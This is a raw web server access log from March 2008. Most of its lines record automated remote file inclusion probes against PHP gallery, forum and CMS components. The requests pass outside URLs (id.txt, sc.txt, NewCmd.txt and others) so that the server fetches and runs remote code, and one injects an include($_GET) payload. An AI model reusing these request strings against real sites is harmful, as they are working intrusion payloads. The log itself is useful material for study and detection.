70.84.237.162 - - [13/Mar/2008:06:06:18 -0700] "GET /logs/access_080119.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.skyoffice.com.ar/includes/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.19.135.21 - - [13/Mar/2008:06:06:48 -0700] "GET /logs/access_080119.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.skyoffice.com.ar/includes/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.35.39.129 - - [13/Mar/2008:06:08:20 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.geek-a-byte.com/icons/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.11.67.242 - - [13/Mar/2008:06:10:48 -0700] "GET /logs/access_080215.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [13/Mar/2008:06:10:48 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.84.237.162 - - [13/Mar/2008:06:11:18 -0700] "GET /logs/access_080103.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.skyoffice.com.ar/includes/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.208.69.118 - - [13/Mar/2008:06:11:30 -0700] "GET /logs/access_080119.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.skyoffice.com.ar/includes/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.69.118 - - [13/Mar/2008:06:11:35 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.skyoffice.com.ar/includes/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.69.118 - - [13/Mar/2008:06:11:35 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.skyoffice.com.ar/includes/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.193.201.57 - - [13/Mar/2008:06:11:36 -0700] "GET /logs/access_080124.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.avrrepository.com//chat/appdata/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
216.193.201.57 - - [13/Mar/2008:06:11:36 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.avrrepository.com//chat/appdata/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
216.193.201.57 - - [13/Mar/2008:06:11:38 -0700] "GET /logs/access_080118.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.avrrepository.com//chat/appdata/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
85.19.135.21 - - [13/Mar/2008:06:12:15 -0700] "GET /logs/access_080103.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.skyoffice.com.ar/includes/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.16.215 - - [13/Mar/2008:06:12:46 -0700] "GET /megumi/earrings/?S=A HTTP/1.0" 200 2065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.193.201.57 - - [13/Mar/2008:06:12:48 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.avrrepository.com//chat/appdata/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
72.30.216.100 - - [13/Mar/2008:06:14:00 -0700] "GET /logs/access_080206.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.108 - - [13/Mar/2008:06:14:16 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.83 - - [13/Mar/2008:06:14:17 -0700] "GET /logs/access_080207.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.57.130.70 - - [13/Mar/2008:06:14:26 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.mrcomp.ru/abf94b32b16c995faf109f731a015c8a/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.113.144.20 - - [13/Mar/2008:06:14:35 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.bangevents.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
217.166.152.66 - - [13/Mar/2008:06:14:47 -0700] "GET /logs/access_080225.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://abb.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
217.166.152.66 - - [13/Mar/2008:06:14:47 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://abb.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
217.166.152.66 - - [13/Mar/2008:06:14:47 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://abb.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
209.213.118.13 - - [13/Mar/2008:06:15:13 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.213.118.13 - - [13/Mar/2008:06:15:28 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.213.118.13 - - [13/Mar/2008:06:15:28 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.213.118.13 - - [13/Mar/2008:06:15:29 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.166.152.66 - - [13/Mar/2008:06:15:41 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://abb.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
217.166.152.66 - - [13/Mar/2008:06:15:42 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://abb.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
217.166.152.66 - - [13/Mar/2008:06:15:42 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://abb.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
207.58.165.41 - - [13/Mar/2008:06:15:43 -0700] "GET //al_initialize.php?alpath=http://www.deafyouthministries.org/albums/album08/dtq_9.jpg.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
207.58.165.41 - - [13/Mar/2008:06:15:43 -0700] "GET /logs//al_initialize.php?alpath=http://www.deafyouthministries.org/albums/album08/dtq_9.jpg.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
208.113.144.20 - - [13/Mar/2008:06:15:47 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.bangevents.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
200.11.67.242 - - [13/Mar/2008:06:15:54 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.35.39.129 - - [13/Mar/2008:06:15:57 -0700] "GET /logs/access_080120.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.geek-a-byte.com/icons/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.39.129 - - [13/Mar/2008:06:15:57 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.geek-a-byte.com/icons/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.39.129 - - [13/Mar/2008:06:16:28 -0700] "GET /logs/access_080119.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.geek-a-byte.com/icons/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.58.186 - - [13/Mar/2008:06:17:18 -0700] "GET /logs/access_080215.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.36.235.74 - - [13/Mar/2008:06:18:03 -0700] "GET /index.php?option=com_mamblog&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.9.36.146 - - [13/Mar/2008:06:18:18 -0700] "GET /logs/access_080126.log/modules/my_egallery/index.php?do=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.9.36.146 - - [13/Mar/2008:06:18:18 -0700] "GET /logs/modules/my_egallery/index.php?do=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.9.36.146 - - [13/Mar/2008:06:18:19 -0700] "GET /logs/access_080225.log/modules/my_egallery/index.php?do=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.112.178 - - [13/Mar/2008:06:18:26 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://chyna.sufx.net/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
64.22.112.178 - - [13/Mar/2008:06:18:26 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://chyna.sufx.net/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
216.32.73.186 - - [13/Mar/2008:06:18:40 -0700] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
60.53.113.64 - - [13/Mar/2008:06:19:44 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.17.77 - - [13/Mar/2008:06:20:48 -0700] "GET /bikes/GPS/?M=A HTTP/1.0" 200 800 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.213.118.13 - - [13/Mar/2008:06:21:14 -0700] "GET /logs/access_080225.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.22.112.178 - - [13/Mar/2008:06:22:19 -0700] "GET //tools/send_reminders.php?includedir=http://chyna.sufx.net/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
64.22.112.178 - - [13/Mar/2008:06:22:19 -0700] "GET /logs//tools/send_reminders.php?includedir=http://chyna.sufx.net/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
72.30.216.107 - - [13/Mar/2008:06:24:28 -0700] "GET /logs/access_080215.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.34.145.198 - - [13/Mar/2008:06:24:55 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
64.34.145.198 - - [13/Mar/2008:06:24:55 -0700] "GET /minamijewelry/source_images/updated1/ HTTP/1.0" 200 1427 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
89.149.205.133 - - [13/Mar/2008:06:25:28 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.149.205.133 - - [13/Mar/2008:06:25:28 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.149.205.133 - - [13/Mar/2008:06:25:29 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.248.221.132 - - [13/Mar/2008:06:25:32 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.avrrepository.com//chat/appdata/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.248.221.132 - - [13/Mar/2008:06:25:32 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.avrrepository.com//chat/appdata/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.248.221.132 - - [13/Mar/2008:06:25:33 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.avrrepository.com//chat/appdata/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.2.130 - - [13/Mar/2008:06:26:08 -0700] "GET /logs/access_080215.log/index.php?option=com_mamblog&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [13/Mar/2008:06:26:08 -0700] "GET /logs/index.php?option=com_mamblog&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.35.39.129 - - [13/Mar/2008:06:26:56 -0700] "GET /logs/access_080119.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.geek-a-byte.com/icons/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.39.129 - - [13/Mar/2008:06:26:56 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.geek-a-byte.com/icons/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.208.69.118 - - [13/Mar/2008:06:27:04 -0700] "GET /logs/access_080103.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.skyoffice.com.ar/includes/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.216.249.224 - - [13/Mar/2008:06:27:36 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=ftp://85.25.48.60/cmd?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
209.216.249.224 - - [13/Mar/2008:06:27:36 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=ftp://85.25.48.60/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
72.30.216.107 - - [13/Mar/2008:06:27:53 -0700] "GET /logs/access.log HTTP/1.0" 200 14894 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.30.226.171 - - [13/Mar/2008:06:29:44 -0700] "GET /logs/access_080207.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.57.130.70 - - [13/Mar/2008:06:30:43 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.mrcomp.ru/abf94b32b16c995faf109f731a015c8a/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.130.70 - - [13/Mar/2008:06:30:43 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.mrcomp.ru/abf94b32b16c995faf109f731a015c8a/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.130.70 - - [13/Mar/2008:06:30:43 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.mrcomp.ru/abf94b32b16c995faf109f731a015c8a/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.130.70 - - [13/Mar/2008:06:31:08 -0700] "GET /logs/access_080225.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.mrcomp.ru/abf94b32b16c995faf109f731a015c8a/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.15.196.106 - - [13/Mar/2008:06:31:33 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
72.15.196.106 - - [13/Mar/2008:06:31:33 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
66.35.39.129 - - [13/Mar/2008:06:31:34 -0700] "GET /logs/access_080118.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.geek-a-byte.com/icons/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.8.218.185 - - [13/Mar/2008:06:34:03 -0700] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.8.218.185 - - [13/Mar/2008:06:34:03 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.8.218.185 - - [13/Mar/2008:06:34:04 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.84.237.162 - - [13/Mar/2008:06:34:15 -0700] "GET /logs/access_080119.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.skyoffice.com.ar/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.237.162 - - [13/Mar/2008:06:34:15 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.skyoffice.com.ar/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.237.162 - - [13/Mar/2008:06:34:16 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.skyoffice.com.ar/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.8.218.185 - - [13/Mar/2008:06:34:58 -0700] "GET /logs/access_080120.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.193.201.57 - - [13/Mar/2008:06:36:41 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.avrrepository.com//chat/appdata/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
216.193.201.57 - - [13/Mar/2008:06:36:41 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.avrrepository.com//chat/appdata/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
70.84.237.162 - - [13/Mar/2008:06:38:12 -0700] "GET /logs/access_080103.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.skyoffice.com.ar/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.238.195.13 - - [13/Mar/2008:06:38:33 -0700] "GET /logs/access_080207.log//newspublish/include.php?path%5Bdocroot%5D=http://www.themaciom.com/guestbook/.dev12/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.238.195.13 - - [13/Mar/2008:06:38:33 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.themaciom.com/guestbook/.dev12/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.149.205.133 - - [13/Mar/2008:06:38:34 -0700] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.17.48 - - [13/Mar/2008:06:38:58 -0700] "GET /logs/access_080225.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.19.135.21 - - [13/Mar/2008:06:39:23 -0700] "GET /logs/access_080119.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.skyoffice.com.ar/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.19.135.21 - - [13/Mar/2008:06:39:23 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.skyoffice.com.ar/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.19.135.21 - - [13/Mar/2008:06:39:23 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.skyoffice.com.ar/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.166.152.66 - - [13/Mar/2008:06:39:25 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://abb.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
217.166.152.66 - - [13/Mar/2008:06:39:25 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://abb.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
217.166.152.66 - - [13/Mar/2008:06:39:26 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://abb.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
66.29.75.45 - - [13/Mar/2008:06:41:13 -0700] "GET /errors.php?error=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.193.222.176 - - [13/Mar/2008:06:41:17 -0700] "GET /errors.php?error=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.85.12.121 - - [13/Mar/2008:06:41:41 -0700] "GET /logs/admin.php?include_path=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
64.34.145.196 - - [13/Mar/2008:06:41:42 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
64.34.145.196 - - [13/Mar/2008:06:41:42 -0700] "GET /minamijewelry/source_images/updated1/ HTTP/1.0" 200 1427 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
212.85.12.121 - - [13/Mar/2008:06:41:47 -0700] "GET /admin.php?include_path=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
194.8.218.185 - - [13/Mar/2008:06:43:06 -0700] "GET /logs/access_080225.log/modules/My_eGallery/index.php?basepath=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.8.218.185 - - [13/Mar/2008:06:43:06 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.8.218.185 - - [13/Mar/2008:06:43:07 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.19.135.21 - - [13/Mar/2008:06:43:30 -0700] "GET /logs/access_080103.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.skyoffice.com.ar/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.166.152.66 - - [13/Mar/2008:06:46:09 -0700] "GET /logs/access_080201.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://abb.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.238.195.13 - - [13/Mar/2008:06:46:27 -0700] "GET /logs/access_080220.log//newspublish/include.php?path%5Bdocroot%5D=http://www.themaciom.com/guestbook/.dev12/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.15.196.106 - - [13/Mar/2008:06:47:00 -0700] "GET //include/functions_common.php?gl_root_path=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
72.15.196.106 - - [13/Mar/2008:06:47:00 -0700] "GET /logs//include/functions_common.php?gl_root_path=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
